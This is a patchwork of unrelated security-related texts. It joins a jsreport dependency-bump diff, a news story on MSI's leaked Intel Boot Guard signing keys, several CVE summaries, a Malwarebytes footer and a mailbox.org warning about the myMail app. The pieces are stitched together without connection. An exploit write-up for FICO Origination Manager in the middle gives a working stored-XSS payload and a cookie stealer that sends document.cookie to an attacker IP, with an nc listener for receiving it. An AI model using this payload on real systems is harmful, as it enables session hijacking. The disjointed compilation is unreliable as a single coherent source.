"@jsreport/studio-dev": "3.2.1",

"mocha": "5.0.5",

"should": "13.2.1",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-fs-store/package.json

Expand Up

@@ -41,7 +41,7 @@

"socket.io": "4.5.4"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-express": "3.7.1",

"@jsreport/studio-dev": "3.2.1",

"del": "6.0.0",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-handlebars/package.json

Expand Up

@@ -24,7 +24,7 @@

"test": "mocha test --timeout=5000 && standard"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/studio-dev": "3.2.1",

"handlebars": "4.7.7",

"mocha": "5.0.1",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-html-embedded-in-docx/package.json

Expand Up

@@ -30,7 +30,7 @@

"node.extend.without.arrays": "1.1.6"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/studio-dev": "3.2.1",

"mocha": "6.1.4",

"should": "13.2.3",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-html-to-text/package.json

Expand Up

@@ -34,7 +34,7 @@

"node.extend.without.arrays": "1.1.6"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/studio-dev": "3.2.1",

"mocha": "8.2.1",

"should": "13.2.3",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-html-to-xlsx/package.json

Expand Up

@@ -43,7 +43,7 @@

"phantom-page-eval": "2.0.1"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-handlebars": "3.2.1",

"@jsreport/studio-dev": "3.2.1",

"handlebars": "4.7.7",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-import-export/package.json

Expand Up

@@ -44,7 +44,7 @@

"@jsreport/jsreport-authentication": "3.4.0",

"@jsreport/jsreport-authorization": "3.3.0",

"@jsreport/jsreport-cli": "3.2.3",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-data": "3.1.0",

"@jsreport/jsreport-express": "3.7.1",

"@jsreport/jsreport-fs-store": "3.2.4",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-jsrender/package.json

Expand Up

@@ -25,7 +25,7 @@

"jsrender": "1.0.11"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"mocha": "5.0.1",

"should": "13.2.1",

"standard": "16.0.4"

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-licensing/package.json

Expand Up

@@ -29,7 +29,7 @@

"axios": "0.23.0"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/studio-dev": "3.2.1",

"mocha": "7.2.0",

"should": "13.2.3",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-localization/package.json

Expand Up

@@ -34,7 +34,7 @@

"devDependencies": {

"handlebars": "4.7.7",

"@jsreport/jsreport-assets": "3.6.0",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-components": "3.3.0",

"@jsreport/jsreport-child-templates": "3.1.0",

"@jsreport/jsreport-handlebars": "3.2.1",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-mongodb-store/package.json

Expand Up

@@ -26,7 +26,7 @@

"mongodb": "5.1.0"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"cross-env": "6.0.3",

"mocha": "5.2.0",

"should": "13.2.3",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-mssql-store/package.json

Expand Up

@@ -23,7 +23,7 @@

"semaphore-async-await": "1.5.1"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"mocha": "8.3.2",

"should": "13.2.3",

"standard": "16.0.4"

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-npm/package.json

Expand Up

@@ -27,7 +27,7 @@

"enhanced-resolve": "5.8.3"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-handlebars": "3.2.1",

"mocha": "9.0.3",

"moment": "2.29.4",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-office-password/package.json

Expand Up

@@ -40,7 +40,7 @@

"xlsx-populate": "1.21.0"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-html-to-xlsx": "3.3.1",

"@jsreport/studio-dev": "3.2.1",

"mocha": "7.0.0",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-oracle-store/package.json

Expand Up

@@ -21,7 +21,7 @@

"@jsreport/sql-store": "3.1.1"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"mocha": "8.3.2",

"should": "13.2.3",

"standard": "16.0.4"

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-pdf-utils/package.json

Expand Up

@@ -45,7 +45,7 @@

"@jsreport/jsreport-assets": "3.6.0",

"@jsreport/jsreport-child-templates": "3.1.0",

"@jsreport/jsreport-chrome-pdf": "3.3.0",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-handlebars": "3.2.1",

"@jsreport/jsreport-jsrender": "3.0.0",

"@jsreport/jsreport-scripts": "3.4.1",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-phantom-image/package.json

Expand Up

@@ -35,7 +35,7 @@

},

"author": "Jan Blaha",

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/studio-dev": "3.2.1",

"mocha": "5.0.5",

"should": "13.2.3",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-phantom-pdf/package.json

Expand Up

@@ -25,7 +25,7 @@

},

"author": "Jan Blaha",

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/studio-dev": "3.2.1",

"mocha": "5.2.0",

"phantomjs-exact-2-1-1": "0.1.0",

Expand Down

CVE-2023-2583: release extensions 3.11.3 · jsreport/jsreport@afaff38

The threat actors behind the ransomware attack on Taiwanese PC maker MSI last month have leaked the company's private code signing keys on their dark website.
"Confirmed, Intel OEM private key leaked, causing an impact on the entire ecosystem," Alex Matrosov, founder and CEO of firmware security firm Binarly, said in a tweet over the weekend.
"It appears that Intel Boot Guard may not be

Data Breach / Software Security

The threat actors behind the ransomware attack on Taiwanese PC maker MSI last month have leaked the company's private code signing keys on their dark website.

"Confirmed, Intel OEM private key leaked, causing an impact on the entire ecosystem," Alex Matrosov, founder and CEO of firmware security firm Binarly, said in a tweet over the weekend.

"It appears that Intel Boot Guard may not be effective on certain devices based on the 11th Tiger Lake, 12th Adler Lake, and 13th Raptor Lake."

Present in the leaked data are firmware image signing keys associated with 57 PCs and private signing keys for Intel Boot Guard used on 116 MSI products. The Boot Guard keys from MSI are believed to impact several device vendors, including Intel, Lenovo and Supermicro.

Intel Boot Guard is a hardware-based security technology that's designed to protect computers against executing tampered UEFI firmware.

The development comes a month after MSI fell victim to a double extortion ransomware attack perpetrated by a new ransomware gang known as Money Message.

MSI, in a regulatory filing at the time, said, "the affected systems have gradually resumed normal operations, with no significant impact on financial business." It, however, urged users to obtain firmware/BIOS updates only from its official website and refrain from downloading files from other sources.

The leak of the keys poses significant risks as threat actors could use them to sign malicious updates and other payloads and deploy them on targeted systems without raising any red flags.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

It also follows another advisory from MSI recommending users to be on the lookout for fraudulent emails targeting the online gaming community that claims to be from the company under the pretext of a potential collaboration.

This is not the first time UEFI firmware code has entered the public domain. In October 2022, Intel acknowledged the leak of Alder Lake BIOS source code by a third party, which also included the private signing key used for Boot Guard.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

MSI Data Breach: Private Code Signing Keys Leaked on the Dark Web

A vulnerability exists in Aruba InstantOS and ArubaOS 10 where an edge-case combination of network configuration, a specific WLAN environment and an attacker already possessing valid user credentials on that WLAN can lead to sensitive information being disclosed via the WLAN. The scenarios in which this disclosure of potentially sensitive information can occur are complex and depend on factors that are beyond the control of the attacker.

CVE-2023-22791

Multiple persistent cross site scripting vulnerabilities in FICO Origination Manager Decision Module version 4.8.1 allow an attacker to execute code in the context of the victim's browser using a crafted payload. Additionally, an attacker with initial access to the application, can get the JSESSIONID cookie of another user and take over their session. These two findings can be chained together.

    # Exploit Title: Stored-XSS in FICO Origination Manager Decision Module 4.8.1 Leads to Session Hijacking# Date: 2023-05-07# Exploit Author: Matei Josephs# Vendor Homepage: https://www.fico.com/# Version: FICO Origination Manager Decision Module 4.8.1# CVE : CVE-2023-30056, CVE-2023-30057Introduction=================Multiple stored cross-site scripting (XSS) vulnerabilities in FICO Origination Manager Decision Module 4.8.1 allow to execute code in the context of the victim's browser using a crafted payload. Additionally, an attacker with initial access to the application, can get the JSESSIONID cookie of another user and take over their session. These two findings can be chained together.Proof of Concept=================All description fields when adding Categories and Products, Product Strategies, Decision Flows, Data Object References, Data Methods, Data Method Sequences, Rulesets, Decision Tables, Decision Trees, Score Models, Scenarios, or Internal Services are vulnerable to a stored XSS using the following payload:   <img/src/onerror=prompt(document.cookie)>An attacker could implement a cookie stealer as follows:  On the attacker's machine:    nc -lvnp <PORT>  In one of the vulnerable description fields:    <img/src/onerror=fetch('http://<ATTACKER-IP>:<PORT>/'+document.cookie)>When a victim would visit the page where the payload was injected, the attacker would receive their JSESSIONID cookie. The attacker could then use the JSESSIONID cookie to log into the Origination Manager Decision Module as the victim.

FICO Origination Manager Decision Module 4.8.1 XSS / Session Hijacking

Categories: News
The most interesting security related news of the week from May 1 till 7



(Read more...)




The post A week in security (May 1 - 7) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (May 1 - 7)

A buffer overflow in the component /proc/ftxxxx-debug of FiiO M6 Build Number v1.0.4 allows attackers to escalate privileges to root.

CVE-2023-30257: Rooting the FiiO M6 - Part 2 - Writing an LPE Exploit For Our Overflow Bug

The myMail app through 14.30 for iOS sends cleartext credentials in a situation where STARTTLS is expected by a server.

At mailbox.org, security and privacy are of the utmost importance to us, particularly in the area of email communication. Therefore, we would like to inform you about a critical security vulnerability in the myMail client for iOS that we have recently discovered. This vulnerability results in unencrypted transmission of user passwords and emails.

Our team became aware of the issue after our customers reported transmission errors when sending emails via the myMail client in the user forum. Upon a thorough examination of the logs, we found that the myMail app attempts to transmit passwords without the required TLS encryption, thus leaving them unprotected and posing a significant security risk. Instead of sending the usual "STARTTLS" command after establishing a connection, the app continued to transmit the user's login details unencrypted. As a result, we were able to extract users' passwords from the connection logs.

At mailbox.org, we consistently reject unencrypted connections on our servers to ensure your security at all times. It was only for this reason that the myMail app's connection attempts failed, bringing the issue to our attention.

This problem not only affects our customers but also poses a general security risk for all users who use the myMail client. Contents and passwords can be intercepted and read by third parties, especially when users are in an open network. If other providers allow unencrypted connections and are used in conjunction with the current version of the myMail app, attackers can also read the content of unencrypted emails.

We strongly recommend that you stop using the myMail client with our service or other email providers until the app developers have resolved these security issues. There are numerous alternative email clients that offer higher security standards and better protect your privacy. At the same time, the current incident underscores the importance of communicating exclusively through securely configured systems that enforce encryption.

Tag

#ios